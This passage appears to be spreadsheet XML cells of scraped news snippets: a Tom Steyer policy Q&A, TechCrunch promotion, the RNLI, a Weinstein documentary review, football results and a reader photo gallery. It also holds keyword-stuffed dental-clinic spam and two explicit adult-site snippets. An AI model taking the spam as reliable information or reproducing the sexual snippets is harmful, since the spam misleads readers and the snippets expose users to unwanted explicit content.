national security interests. I believe we should stand up strongly to protect the interests of American intellectual property and punish those that don’t obey the laws. We are also going to have to protect American consumers and workers, ensure our cybersecurity and work with China to address pressing global issues like the climate crisis and regional security. The devil is in the details of how we compete with China, and when we engage with them as a strategic partner. 9. How large a threat does automation represent to American jobs? Do you have a plan to help train low-skilled workers and otherwise offset job loss? From the impacts of Climate Change to the threat of automation, working people have gotten the short end of the stick for the past 40 years. As an investor, I know that if we invest in our people and the technologies needed to save our planet, we can give workers the skills they need for the new economy. These investments need to be done now, not when a million truck drivers lose their jobs. My Justice Centered Climate Plan includes investments in Civilian Climate Corps, which will create one million jobs over 10 years. 10. What steps will you take to restore net neutrality and assure internet users that their traffic and data are safe from manipulation by broadband providers? The Trump administration’s decision to rescind federal net neutrality rules put the internet into the hands of powerful corporations without protecting consumers. Internet service providers should not be able to charge websites to reach their subscribers. I would reinstate the net neutrality rules written during the Obama administration. In California, I was proud to help pass SB 822, the net neutrality bill that was signed into law — it not only restored the Obama-era standards but went steps further to advance the ball in this policy area. Source: https://techcrunch.com/2019/09/20/ten-questions-for-2020-presidential-candidate-tom-steyer/ The post Ten questions for 2020 presidential candidate Tom Steyer appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Cara Waters</t>
  </si>
  <si>
    <t>Investors are beginning to question the lack of gender diversity in the ASX200.</t>
  </si>
  <si>
    <t>/u/Cockamamie43</t>
  </si>
  <si>
    <t>submitted by /u/Cockamamie43 [link] [comments] The post Fucking friend’s wife in his bathroom appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>Mother who killed son in crash at Kuitpo apologises in court; Man jailed for throwing Molotov at Old Reynella hotel; MPs meet to discuss land tax; Mt Barker Council votes to introduce cat curfew.</t>
  </si>
  <si>
    <t>BP Plc is preparing to announce that the British oil company's chief executive, Bob Dudley, plans to retire within about 12 months, Sky News reported https://bit.ly/2nuYqLQ on Saturday.</t>
  </si>
  <si>
    <t>Laura Devlin</t>
  </si>
  <si>
    <t>Dog lovers are being asked to sign up as volunteers for a bumper event at Baxter Park.</t>
  </si>
  <si>
    <t>You would like to think that a video game developer has a pretty good understanding of what he is doing, but that may not be the case at Kojima Productions. Hideo Kojima, the myth, the man and the legend said that he did not understand what was happening in his own game. Good luck to all who are trying to understand what is Death Stranding . In an interview with the Financial Times and reported by VG247, Kojima said: "Death Stranding … still today, I do not understand the game. His vision of the world, his gameplay, are all new. is to create a genre that does not currently exist and that surprises everyone.There is naturally a risk to this … " This is classic Kojima, is not it? The video game pioneer has said a number of strange things in the past, but this one could take the cake. You do not understand your own game? We like that. Although, if you consider that urinating leads to the blossoming of flowers, babies can take you to another dimension, and the Doritos' king, Geoff Keighley, is a known quantity in the world of Death Stranding, we are certain that we will have to unpack everything anyway. Continue to be you, Hideo Kojima. .</t>
  </si>
  <si>
    <t>My Kinks: I can be really grateful and make your dreams come Webcam profile: I am a happy woman, but who feels lonely, and seeks for a person who can solace my day and nights. My loving heart admire passion, desire, and man power. Favourite sex position: missionary What I do in my amateur show: sweet talk What I don’t like: Gallery</t>
  </si>
  <si>
    <t>Shane Wright</t>
  </si>
  <si>
    <t>Cautious home owners may not cut repayments, the Reserve Bank of Australia has warned, undermining efforts to stimulate the economy through lower interest rates.</t>
  </si>
  <si>
    <t>WATCH: The latest forecast for Australia's major urban and regional centres.</t>
  </si>
  <si>
    <t>robinCTS</t>
  </si>
  <si>
    <t>ShopBack have upsized their Liquorland cashback to 10% across the board, including beer. Stacks with the 2000 Bonus Flybuys Points with $99 Spend offer.</t>
  </si>
  <si>
    <t>We hope you visit our children's dental clinic in Burlington and Milton, Ontario JUST for kids! We are Pediatric Dentist healthcare specialists proudly serving the kids of the Burlington, Milton. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, Market Place Dental Centre, King's Cove Family Dental, Young Dentistry, Oksana M. Being the family-friendly dental clinic we are, we put a strong focus on dentistry for children that's welcoming, fun, and educational. enjoys the challenges of cosmetic dentistry and implantology and is a member of the Canadian Dental A. Welcome to Marketplace Dental Centre, one of best dental Clinics in Georgetown, Ontario. Dr. Anoop Sayal and Associates have been proudly serving Georgetown and Halton Hills since 1994 and we warmly welcome you to join our family of patients. We. Best General Dentistry in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, King's Cove Family Dental, Trenton A W Denturist, Diana Dental, Pownall Janet, DDs – Still Waters Dental, Lefebvre. Best Dentist Near Halton Hills Ontario Cosmetic Dental Clinic In Halton Hills Find the best Dentist in Halton Hills, ON. Discover Dentists real customer reviews and contact details, including hours of operation, Georgetown Dental Clinic Dentist in Halton Hills 211 Guelph Street, Halton Hills, ON L7G 5B5 Dentist in Hal. Most Popular Dental Clinic Near Halton Hills Admire Dental is a</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/27/why-startups-exhibit-in-startup-alley-at-disrupt-berlin-2019/ Why startups exhibit in Startup Alley at Disrupt Berlin 2019 If you’re the founder of an early-stage startup, listen up. One of the best ways you can introduce your innovative company to the international tech community is to exhibit in Startup Alley at Disrupt Berlin 2019 on 11-12 December. There are plenty of reasons to exhibit, but here’s the first thing you need to know. You have two ways to exhibit in Startup Alley. You can simply purchase a Startup Alley Exhibitor Package OR you can apply to our TC Top Picks program and win a Startup Alley Exhibitor Package and a VIP experience (more on that in a minute). As an exhibitor, you’ll receive three Founder passes, access to programming on all stages (including the Startup Battlefield competition, speakers, interactive workshops and Q&amp;A Sessions), the complete attendee list via Disrupt Mobile App, CrunchMatch — TechCrunch’s free networking platform, the complete press list, entrance to networking parties and exclusive video content access once the conference ends. Exhibiting gives you prime exposure as thousands of Disrupt Berlin attendees — including 200 media outlets — from more than 50 countries explore Startup Alley to meet and greet the latest startups, sniff out emerging trends and network for potential partners, investment possibilities, collaboration and connection. Here’s how one co-founder, David Hall of Park &amp; Diamond, describes his Startup Alley experience: Exhibiting in Startup Alley is the best training ground for early-stage startup founders, and it was a game-changer for us. We received more insight into our product development process, and we engaged with media and potential investors. It’s a tremendous opportunity to grow. Now, let’s talk about the TC Top Picks. The application deadline is 1 October at 12 p.m. (PST). You’re eligible if your startup falls into one of these tech categories: AI/Machine Learning, Biotech/Healthtech, Blockchain, Fintech, Mobility, Privacy/Security, Retail/E-commerce, Robotics/IoT/Hardware, CRM/Enterprise and Education. If you’re selected (TC editors will choose up to five startups in each category), you’ll exhibit for free one day and you’ll be interviewed by a TechCrunch editor live on the Showcase Stage. We’ll record that interview and promote it on our social media platforms. Luke Heron, co-founder and CEO of TestCard, exhibited in Startup Alley as a TC Top Pick at Disrupt Berlin 2018 and hoped to cultivate relationships with investors. It seems, by the email he sent to TechCrunch editors, that his time exhibiting in Startup Alley was well spent: We just closed $1.7m in funding in large part to you and your team,” Heron wrote. “You guys are fantastic — the lifeblood of the startup scene. Whether you’re looking for founders or funders, collaboration and connection or publicity and promotion, you’ll find it, and a ton of opportunity, in Startup Alley. Join us and the international startup community at Disrupt Berlin 2019 on 11-12 December. Buy a Startup Alley Exhibitor Package or apply to TC Top Picks today. Is your company interested in sponsoring or exhibiting at Disrupt Berlin 2019? Contact TechCrunch’s sponsorship sales team by filling out this form. Source: https://techcrunch.com/2019/09/27/why-startups-exhibit-in-startup-alley-at-disrupt-berlin-2019/ The post Why startups exhibit in Startup Alley at Disrupt Berlin 2019 appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>What did Joe Biden and his son do to attract the unwanted attention of Donald Trump and his allies?</t>
  </si>
  <si>
    <t>Hanna Mills Turbet</t>
  </si>
  <si>
    <t>More than 136,000 eggs are splattered across a road when the pallets they were being transported in shifted and fell off a tractor-trailer driving through Pennsylvania.</t>
  </si>
  <si>
    <t>The finest photos from the international wire agencies as chosen by our picture editors.</t>
  </si>
  <si>
    <t>Thank you for joining me tonight for a special live blog from the Staples Center in Los Angeles for the Errol Spence Jr vs. Shawn Porter fight. I will be providing updates and round by round scoring for the main event with my unofficial scorecard, Source: Sports Business News</t>
  </si>
  <si>
    <t>Melbourne Storm star Ryan Papenhuyzen is a free spirit on the field, but his pre-game routines are much more prescribed.</t>
  </si>
  <si>
    <t>Sam Cunningham</t>
  </si>
  <si>
    <t>In a game of little quality, both sides were shadows of their former selves and produced a depressing echo of former glories The post Manchester United and Arsenal show why they are further away than ever from being title challengers appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Jane Clinton</t>
  </si>
  <si>
    <t>The RNLI has enjoyed a “sharp increase” in online donations following news reports criticising its overseas work. The charity, which receives no government funding, has been inundated on Twitter with people pledging money and sending messages of support. A statement from the charity said: “In response to the recent media pieces about the lifesaving work we are doing overseas, we have been very encouraged to see a sharp increase in online donations, coupled with some very positive messages of support.” Among the numerous donations was writer Neil Gaiman. He tweeted: “I just donated. It may make up for a few people who stopped donating because they think that more people should die at sea.” The story which appeared in the Mail on Sunday was critical of the charity which is said had increased its spending on foreign projects from £1.1m to £3.3m over the past five years while the charity planned to shed 135 jobs following a loss of £6.3m in the last year. Proud Thank you to everyone who has sent messages of support and made donations to us over the past 24 hours – we simply couldn’t save lives without our amazing supporters. — RNLI (@RNLI) September 16, 2019 However, a spokesman for the charity said the vision of the RNLI’s founder Sir William Hillary, who set it up in 1824, was for work on preventing drowning to be extended “to the most remote quarters of the globe”. It also said that is was “proud” of its international work and added in a tweet: “Its saves (mostly kids’) lives. And we haven’t kept it secret – it’s in our annual report, on our website and in the media. We spend just 2% of our expenditure on this work.” Some of their international work includes helping with swimming lessons for children in Bangladesh. It also offers support to, among others, a project in Zanzibar which teaches women swim survival skills. The charity said the “majority of the RNLI’s involvement” was funded by a donor “who specifically wanted the money to go towards this project”. Polarising However, the charity sounded a note of caution despite the spike in donations. “This is such a polarising issue, and we have also received some very negative responses, including people contacting our supporter care team requesting to withdraw or reduce their support for the charity,” it said in a statement. “The volume of responses we have received on this matter is vast and ongoing – the overall picture is changing constantly at the moment, so it may be several weeks before we have a full understanding of its impact on donations to the RNLI.” According to World Health Organisation an estimated 320,000 people drown each year worldwide. More on charity French mayor attacks Briton who left rowing machine on Mont Blanc Dishoom has donated 7m meals to hungry children since 2015 Oxfam to open first superstore with drive through donation point Veteran trapped in his body for 12 years rows channel 'Reading can be fun and shouldn't be seen as a chore' Ban on charity bake sales by Women's Institute campaigners lifted The post RNLI sees ‘sharp increase’ in donations following report criticising its overseas work appeared first on inews.co.uk. The post RNLI sees ‘sharp increase’ in donations following report criticising its overseas work appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>HIGH blood pressure affects up to 45 per cent of adults and is the leading global cause of premature death. Having a certain condition in the mouth could mean you’re more likely to develop the condition. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>We need help replacing 5-6 lightbulbs on the exterior of our house. They’re at varying heights, but I estimate the highest are 35 ft up, possible 40, so a long extension ladder is required. We have one, but I don’t believe it’s long enough for the highest bulbs. A couple of the bulbs are in .. Read more</t>
  </si>
  <si>
    <t>Despite a “poorly-worded” section of the British Columbia Motor Vehicle Act, a 24-hour driving prohibition against a suspected impaired driver has been restored in a recent appeal court ruling. In July of 2017, Patrick George Franlin Evans was told by… The post Why 24-hour driving bans have lawyers arguing in this province appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>David Baxter</t>
  </si>
  <si>
    <t>The Regina Lewvan riding is one of Regina two entirely urban ridings, alongside Regina Wascana.</t>
  </si>
  <si>
    <t>Ayesha Hazarika</t>
  </si>
  <si>
    <t>Our democracy faces clear and present danger right now. We have a Government which may well have broken the law. We have a Prime Minister whose word means nothing and may not obey the law. But there’s another grave threat. Who will represent us when the next parliament returns after the general election – whenever that will be? The shock withdrawal of the whip from 21 Conservative MPs was genuinely breath-taking. Mainly because we all thought it would be the Labour leadership who presided over a “Stalinist purge” of pesky disobedient MPs. It’s typical; Labour give it the big one about de-selections and then the Tories only go and do it properly.… The sword of Damocles hangs over many Labour MPs who face trigger ballots which could see them deselected. The Labour MP for Hull North Diana Johnson has been triggered and others are worried and spending time (and a lot of money) trying to fight off Momentum on their patch. This is also having a chilling effect on what they may normally say about big issues on which they may disagree with their leader. Like Brexit. Both Boris Johnson and Jeremy Corbyn and their advisers have decided to crack the whip with MPs who disagree with them. They have decided that dead eyed, mindless loyalty to the leadership, no matter how badly it behaved or how incoherent the line to take may be – is now, not just desirable, but critical. Rory Stewart has ruled out standing against Boris Johnson (Photo: AFP/Getty) I admire those who have the guts to speak out on both sides when it has – or could – cost their job. From Rory Stewart to Tom Watson. But what does this mean for the future? I worry that with a general election on the horizon, we will see parties select candidates who will parrot the politics of the leader, who will toe the line, show slavish devotion, with no danger of any critical thinking and will be docile, dumbed-down lobby fodder. Many will rise up quickly through the ranks and soon appear on our airwaves trotting out such embarrassing, moronic defences of their leaders, we may one day look back and remember Kwasi Kwarteng and Richard Burgon rather fondly. Maybe not. And with both parties adopting such an authoritarian approach, why would any bright, independent minded, intelligent person want to be an MP right now? Amber Rudd appeared on Andrew Marr on Sunday morning following her explosive resignation (Photo: BBC) MPs are sent to Parliament to represent the best interests of their constituents using their own wit and judgement not to be supplicants. Most people go into politics because they are characters, have views and opinions and have made a name for themselves for being a strong individual. Many impressive candidates I know, who were selected a while ago, are watching in horror as their parties morph into something rather oppressive and are seriously questioning whether this is what they signed up for. And who could blame them when we are seeing so many decent MPs resigning because they are fed up. With all the turmoil we face as a country, we need the best and the brightest people in Parliament who won’t be afraid to say what they think and who will not be toadying yes men and women. Ayesha Hazarika is Editor of the Londoner, Evening Standard More from Ayesha Hazarika It's game over for Remainers like me - a no-deal Brexit feels certain Why a landslide victory for Boris Johnson should worry even the Tories Who is to blame for Labour's poor poll performance? We centrists need to face facts: the people of Britain want polarised An awkward meeting with Theresa May showed me she'd make a bad PM In Scotland, a storm is brewing The post Conservatives and Labour are shedding good MPs for defying the leadership appeared first on inews.co.uk. The post Conservatives and Labour are shedding good MPs for defying the leadership appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>age-friendly communities, affordable and proper housing, home support service, transportation, and safety and security);. Currently, our dental services are extended at two prime areas of Pune: Kalyani Nagar / Viman Nagar and Nigdi-Pradhikaran. In. Friendliest Dentist In Airdrie Welcome We are happy to provide a variety of procedures and the friendliest service. Our Airdrie dentists offer procedures that range from routine maintenance to comprehensive cosmetic and restorative treatment, all using the latest methods and. 3 reviews of Sierra General Dentist in Airdrie, Alberta Community See All 42 people like this 43 people follow this About See All. Friendliest Dental Clinic Near Airdrie Alberta Kid Friendly Dentist Near Airdrie Alberta Recent Comments Archives August 2019 July. Welcome We are happy to provide a variety of procedures and the friendliest service. Our Airdrie dentists offer procedures that range from routine maintenance to comprehensive cosmetic and restorative treatment, all using the latest methods and. 3 reviews of Sierra Springs Dental "These Guys are Incredible! I went in to book an appointment about 3 months ago, After years of neglect and avoiding a Dentist the time finally came to ' get a check up '. I look up reviews online. Voodoo Manufacturing Expands 3D-Printing Factory – BROOKLYN, NY—Voodoo Manufacturing has launched Voodoo Clear Aligners, a new dental manufacturing and distribution service. Friendliest Dental Clinic Near Kitchener Innaloo Dental Clinic Announces Sunday Opening Hours to Better Serve the North-West Perth Suburbs.</t>
  </si>
  <si>
    <t>Over thirty people are feared dead after a yacht burst into flames off the coast of California.</t>
  </si>
  <si>
    <t>There is no better way to announce yourself as a permanent member of the Far North racing community than winning a big country Cup.</t>
  </si>
  <si>
    <t>My eight-year-old daughter doesn’t stress about climate change, and it’s kinda stressing me out.</t>
  </si>
  <si>
    <t>Jeff Robson</t>
  </si>
  <si>
    <t>Untouchable: The Rise and Fall of Harvey Weinstein BBC2 ★★★★ Miramax was the darling of the cinema industry in the 1990s, producing and distributing films that tackled serious subject matter and combined artistic excellence with box-office success – Cinema Paradiso, My Left Foot, sex, lies and videotape, Pulp Fiction and many others. The story of its founders, Bob and Harvey Weinstein, seemed like an equally feelgood tale of underdogs taking on the big studios. But subsequent revelations have painted a very different picture. Untouchable: The Rise and Fall of Harvey Weinstein was a feature-length documentary examining the sexual assault allegations against the once-feted film mogul, with extensive testimony from employees, associates and actresses – from famous names such as Rosanna Arquette and Paz de la Huerta to the many relative unknowns who felt that getting to know a renowned producer would help their fledgling career – recalling their encounters with him in close (and remarkably similar) detail. He stands accused on multiple charges of sexual assault, all of which he denies. But as the stories were told, usually involving harassment and nakedness at least, followed by threats to ruin careers if a word was breathed afterwards, a picture emerged of – at the very least – a man who took pleasure in acting like an old-style movie mogul from the “casting couch” era. They also illustrated the backdrop of a culture of entitlement and denial, in which guilty secrets were hushed up, shrugged off or covered by non-disclosure agreements. A picture emerged of a man who enjoyed behaving like an old-school movie mogul (Photo: BBC/Getty) It was harrowing, and occasionally felt exploitative, as shots recreating the hotel backdrops accompanied the testimony – adding to the dramatic effect but also creating a distancing, unreal quality. The film’s greatest strength lay in director Ursula Macfarlane‘s sensitive handling of the women’s straight-to-camera testimony, as they recalled what were clearly deeply traumatic experiences. Read More: Harvey Weinstein documentary-maker Ursula Macfarlane: ‘Weinstein is a genius ⁠— I’m concerned about his trial’ She was also excellent at detailing the long and painstaking efforts of journalists like Ronan Farrow and Megan Twohey to bring the story into the open, in the face of direct and covert pressure to keep quiet and not take on the man who described himself as “the f***king sheriff”. And she vividly conveyed the chauvinistic attitude in some quarters that the victims had somehow “brought it on themselves” and that continuing to be associated with Weinstein in any way following the alleged incidents invalidated their testimony. Rosanna Arquette was one of several talking heads in Untouchable: The Rise and Fall of Harvey Weinstein (Photo: LT2 Films/Ursula Macfarlane) It made for grimly compelling, if at times depressing, viewing. But there was a welcome sense that the film industry was beginning to own up to the skeletons in its closet. And the final scenes, chronicling the rise of the #MeToo movement struck a positive note as more and more women became empowered to report similar behaviour. But as one of the interviewees grimly pointed out, “there’s still one in every industry”. And nothing made up for the sour taste left by the willingness of the liberal political and cultural elites of Hollywood and New York to turn a blind eye to the rumours as long as Weinstein kept making worthy but successful films – and throwing lavish parties. More TV Reviews The Dark Crystal: Age of Resistance: A stunning piece of artistry ★★★★ Carnival Row: Bloom and Delevingne team up for a dark fairy tale ★★★★ Who Do You Think You Are?: Paul Merton's tale was intensely moving ★★★ Cannabis: Miracle Medicine or Dangerous Drug?: free from hype ★★★ The Great British Bake Off, Week 1, review: strong line-up ★★★★ Sink or Swim for Stand Up to Cancer: cast aside your cynicism ★★★ The post Untouchable: The Rise and Fall of Harvey Weinstein, BBC2, review: An old-school mogul let loose in a world of entitlement and denial appeared first on inews.co.uk. The post Untouchable: The Rise and Fall of Harvey Weinstein, BBC2, review: An old-school mogul let loose in a world of entitlement and denial appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>PSG, Man City shine in Champions League; big names struggle Original Source GENEVA (AP) — Paris Saint-Germain and Manchester City succeeded where storied rivals failed in their opening Champions League games. Even with its star forwards absent, PSG eased to a 3-0 win Wednesday over 13-time European champion Real Madrid, which missed the influence of suspended defender Sergio Ramos. The French champion relied instead on Angel Di Maria, the former Madrid winger, who scored twice with smart, first-half shots that quickly settled the outcome. Man City was also ruthless and efficient in winning 3-0 against Shakhtar Donetsk in Ukraine. Wins for two wealthy clubs with burning ambition to get a first European title came as the traditional Champions League powers struggled this week. Of the nine clubs to have played in the final since 2011, only Bayern Munich won this week — also by 3-0 on Wednesday against a Red Star Belgrade team which had to come through four qualifying rounds. Juventus and Tottenham both let two-goal leads slip away from home, before drawing 2-2 against Atlético Madrid and Olympiakos, respectively. PARIS SHINES The biggest stars at the Parc des Princes were watching from expensive seats in the stands. Neymar, who was suspended, and injured teammate Kylian Mbappe were captured by television cameras whooping and giggling at the sight of full-backs Juan Bernat and Thomas Meunier marching through Madrid’s defense in stoppage time to create and score a deserved third goal. The third PSG star striker, Edinson Cavani, was also out injured yet the French champion’s victory was never in doubt. “People say we’re not favorites and it can take the pressure off,” PSG coach Thomas Tuchel said. PSG has flattered to deceive too often in recent Champions Leagues, though this looked like a statement win for Tuchel over Zinedine Zidane, who lifted the trophy in each of the three seasons he first coached Madrid from 2016-18. Madrid’s biggest offseason signing Eden Hazard rarely connected with his teammates, while club veterans Gareth Bale and Karim Benzema had goals disallowed. “Normally, with the players we have, we create a lot of chances and today it wasn’t possible,” Zidane said. SPANISH STRUGGLES It’s been a tough week for the big three of Spanish football. Madrid failed to score on the road, like Barcelona which was lucky to take a 0-0 draw from Borussia Dortmund on Tuesday. Atlético’s 2-2 draw at home showed more resolve and fight, and stopped long-time nemesis Cristiano Ronaldo — who was booed throughout by home fans — from scoring for Juventus. Goals from Juan Cuadrado and Blaise Matuidi had Juve dominating deep into the second half. Atlético fought back through Stefan Savic in the 70th and Mexico midfielder Héctor Herrera leveled in the 90th with a header from Kieran Trippier’s cross. EASTERN PROMISE Clubs from eastern Europe are often overmatched in the Champions League, and Dinamo Zagreb had lost its last 11 group-stage games, scoring just once. Still, Zagreb gave a painful lesson to Atalanta, thrashing the Italian debutant 4-0. Mislav Orsic scored a hat trick. Atalanta coach Gian Piero Gasperini called it “a nightmare of a game. They were stronger in every aspect.” Lokomotiv Moscow scored a rare away win for a Russian team, winning 2-1 at Bayer Leverkusen. Red Star Belgrade couldn’t complete the hat trick of wins in Munich. Bayern controlled the game but had only Kingsley Coman’s first-half header to show before late goals from Robert Lewandowski and substitute Thomas Mueller. EARLY DRAWS Maybe it’s the unusual kickoff time — at 6:55 p.m. in most of Europe — but all four early evening starts produced draws this week. Tottenham wasted a two-goal first-half lead at Olympiakos on Wednesday, taking control with a penalty by Harry Kane and a smart shot from Lucas Moura in Athens. The Greek league runner-up struck back on the stroke of halftime before Mathieu Valbuena beat his former France teammate Hugo Lloris from the penalty spot in the.. In Belgium, Club Brugge drew 0-0 with Galatasaray, as both teams failed to make a stronger mark on Group A where PSG and Madrid are strongly favored to advance. ___ More AP soccer: https://apnews.com/tag/apf-Soccer and https://twitter.com/AP_Sports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PSG, Man City shine in Champions League; big names struggle appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Andrew Morrison</t>
  </si>
  <si>
    <t>We love posting the photographs that reveal the views from our reader’s windows. Whether it’s a back alley in the Fall or a sandy beach in high Summer, we’re always interested in seeing what you see from your windows at home or work or through the windshield. Browse the full collection. Submitted by R.A. | Chow time on set | Burnaby, BC | 4:14pm Email us a recent photograph of your view with the estimated time and place to andrew [at] scoutmagazine.ca and we’ll add it to our growing collection. Cell phone shots are fine if they are at least 1600px wide. Reader T.R. | Above Coal Harbour | 6pm | Vancouver, BC Scout Central (our own view) Main St. Vancouver, BC 811pm Hastings Sunrise Vancouver, BC 745pm West End Vancouver 1030am Mt. Pleasant Vancouver 1000am West End Vancouver 1030am Woodward’s Building, Gastown Vancouver 915am Reader W.E. Venables Vancouver 447pm Reader F.R. West Vancouver, BC 5pm Reader M.S. Mosquito Creek, North Vancouver 5pm Reader S.L. Yukon and 27th Vancouver 7pm From reader O.L. Paradise Valley Squamish 1024am Reader J.M. Sentinel Hill West Vancouver 830pm Reader K.M. Hastings East Vancouver 620am Reader G.V. Commercial Drive Vancouver 1020am Reader G.P. West End Vancouver 200pm Reader J.D. Victoria Drive Vancouver 850pm Reader A.H. Commercial Drive Vancouver 100pm Reader A.F. False Creek Vancouver 805pm Reader T.L. Mt. Pleasant Vancouver 545pm Reader O.L. Catania Sicily 202pm Reader A.M. Long Beach Lodge Tofino 850pm Reader M.R. Saanich, BC 1200pm Reader J.E. Main and Kingsway Vancouver, BC 500am Reader A.H. East Vancouver, BC 932am Reader M.S. North Vancouver, BC 300am Reader J.M. Mount Pleasant Vancouver, BC 800pm Reader M.B. Maple Tree Square Vancouver, BC 107pm Reader A.C. South Granville Vancouver, BC 1134pm Reader B.B. Strathcona Vancouver, BC 1150am Reader W.U. Mt. Pleasant Vancouver, BC 915pm Reader T.D.M Naramata, BC 500pm Reader J.B Seattle, Washington, USA 915pm Reader B.M Richmond, BC Afternoon Reader M.P. 15th and Fraser Vancouver, BC 1015pm Reader K.K. Naramata Bench The Okanagan Valley, BC 745pm Reader M.B. Gastown Vancouver, BC 1230pm Reader J.C. East Hastings Vancouver, BC 1230pm Reader B.R. Mackenzie Beach Tofino, BC 900am Reader G.H. Main at 16th Vancouver, BC 930am Reader JG Oakura Taranaki New Zealand 345pm Reader S.L. somewhere near Calgary, Alberta 930am Reader P.H. Dundarave West Vancouver, BC 630pm Reader S.F. Whytecliff West Vancouver, BC 1000am Reader E.E. Oak Bay Victoria, BC 530pm (2) Reader J.M. Chinatown Vancouver, BC 1145am Reader A.G. Gastown Vancouver, BC 750pm tyj Reader "M.S." Cowichan Valley, Vancouver Island, BC 4:25pm Reader G.L. Gastown Vancouver, BC 5:32pm Reader LA Tofino BC 1pm Reader DD Gabriola Island BC 758am Reader MB Outside The Bayside Bistro Parksville BC 430pm Reader VL Kitsilano Vancouver BC 345pm Reader SS mid-air over the West Side Vancouver BC 1118am Reader CS North Vancouver BC 535pm TC Lok Wah Hong Kong 1034pm Reader KF North Burnaby 730am Reader LM Ribeirao Claro Brazil 434 pm Reader ABR Mount Pleasant Vancouver BC 448pm Reader AP South Granville Vancouver BC 100 pm Reader MF Marais Rue de Temple Paris France 300 pm Reader RG Gastown Fire Escape Vancouver BC 916pm AM St Croix US Virgin Islands 1200pm Reader SD Paia Maui Hawaii USA 615pm Reader MN Amman Jordan 643pm Reader AR Mt Seymour from Deep Cove North Vancouver BC 430pm Reader LN Quebec St Vancouver BC 430pm Reader HS West Hollywood California USA 430pm Reader SC Hamilton St Vancouver BC 612pm Reader A Mission BC Dinner Time Reader LT Main St Vancouver BC Reader AM Copacabana Palace Hotel Rio de Janeiro Brazil 812am Reader KC Lost Lagoon Stanley Park Vancouver BC 1049am Reader MS | Woodwards Gastown Vancouver BC 612pm Reader DB Shangri La Hotel Jakarta Indonesia 553am Reader LV Downtown Cambie St Vancouver BC 2:20pm Reader S.Y. Clark at 3rd Vancouver, BC 6:30pm Reader J.C. Siena, Italy 6:30pm Reader C.W. The Village at False Creek Vancouver, BC 4:25pm Reader C.J. | Water &amp; Cambie | Vancouver, BC | 2:00pm Reader D.B. The Westin, Paris, France 12:00pm Reader T.G. | I am crying. My city is on fire. | Vancouver, BC | 9:30pm Reader S.D | Victory Square | Vancouver, BC | 5:30pm Reader J.I. | Overlooking the lake | Osoyoos, BC | 7:45pm Reader J.R. | East Van Apartment | Vancouver, BC | 7:45pm Reader C.W. | English Bay | Vancouver, BC | 6:00pm Reader C.L. | Keefer Place | Vancouver, BC | 12:55pm Reader S.K. | Looking West towards Lighthouse Park | West Vancouver, BC | 2:37pm Reader J.I. | Sooke, BC | 7:30pm Reader N.F. | Gassy jack Square, Gastown | Vancouver, BC 12:11pm Reader A.L. | Taipei, Taiwan | 6:00am Reader P.K. | Railway Tracks, Gastown | Vancouver, BC | 10:47am Reader M.N. | Returning from Protection Island | 2:00pm A.M. | Summerland, BC | 9:12pm Reader P.D. | Little Elbow Campground, Kananaskis Country | Alberta | 9:02am Reader S.H. | Gagliano Aterno, Abruzzo | Italy | 1:00am Reader K.M. | Kensington Market | Toronto, Ontario | 1:00pm Reader J.I. | Nita Lake | Whistler, BC | 5:45pm Reader I.F. | Petrovac, Montenegro | 10:35am Reader J.M. | Sakinaw Lake | Sunshine Coast, BC | 10:54am Reader M.K. | Crosstown | Vancouver, BC | 3:20pm Reader S.C. | Strathcona | Vancouver, BC | 4:15pm | SHARE YOUR VIEW Reader G.G. | Yaletown | Vancouver, BC | 11:33am Reader S.S. | On a train near Interlaken | Switzerland | 10:21am Reader J.G. | Cambie &amp; 17th | Vancouver, BC | 3:10am Reader K.P. | Strathcona | Vancouver, BC | 8:30am Reader T.V. | Parker St. Studios | East Vancouver, BC | 5:00pm Reader L.A. | Hawks &amp; Pender, Strathcona | East Vancouver, BC | 7:16am Reader L.A. | Willow's Beach | Victoria, BC | 4:30pm Reader I.H. | Regal Kowloon Hotel | Hong Kong | 8:45pm Reader B.M. | Blood Alley, Gastown |Vancouver, BC | 10:45am Reader C.T. | Fraser River | Vancouver, BC | 8:08am Reader V.C. | BC Place Sunrise | Vancouver, BC | 8:25am Reader S.W. | Lonsdale Quay | North Vancouver, BC | 1:30pm Reader R.W. | Buenos Aires, Capital Federal | Argentina | 6:10am Reader D.G. | Gastown, Vancouver | 4:35pm Reader H.P. | Main &amp; 5th | Vancouver, BC | 10:00am Reader E.S. | Art Department, Mammoth Studios | Vancouver, BC Reader A.V. | Harbour Center | Vancouver, BC | 3:48pm Reader M.K. | Victoria Drive | Vancouver, BC | 4:10pm R.K. | Eagles eyeing crow's nest | 5th Avenue, Kitsilano | Vancouver, BC | 11:00am From Z.H. | West End | Vancouver, BC | 4pm From D.P. | West Broadway/Fairview | Vancouver, BC | 4pm From K.L. | Hastings &amp; Boundary | Vancouver, BC From R.M. | Wailea, Hawaii | USA | E.D. | Graveley &amp; Woodland | Vancouver, BC | 3:06pm S.Y. | Victory Square | Vancouver, BC | 3:39pm From D.D. | Carrall &amp; Cordova in Gastown | Vancouver, BC | 11:14pm From S.S. | Dunsmuir | Vancouver, BC | 6:30am From R.J.R | East Hastings (Hastings-Sunrise) | Vancouver, BC | 6:15pm From S.L. | Sheraton Wall Center (31st Floor) | Vancouver, BC | 9:36m From K.Y. | Waterfront (Harbour Centre) | Vancouver, BC | 6:15am R.B. | Davie Village | Vancouver, BC | 7:30pm From C.W. | Deltascoot Scooter Rally musters | Delta, BC | 12:58pm T.L. | Washroom stall at the top of the Standard Hotel | New York, NY | 2:30pm Reader V.R. | helijet traveling from Vancouver to Victoria Reader C.C. | Pendrell Sound, BC | 7:30pm Reader M.L. | Somewhere over 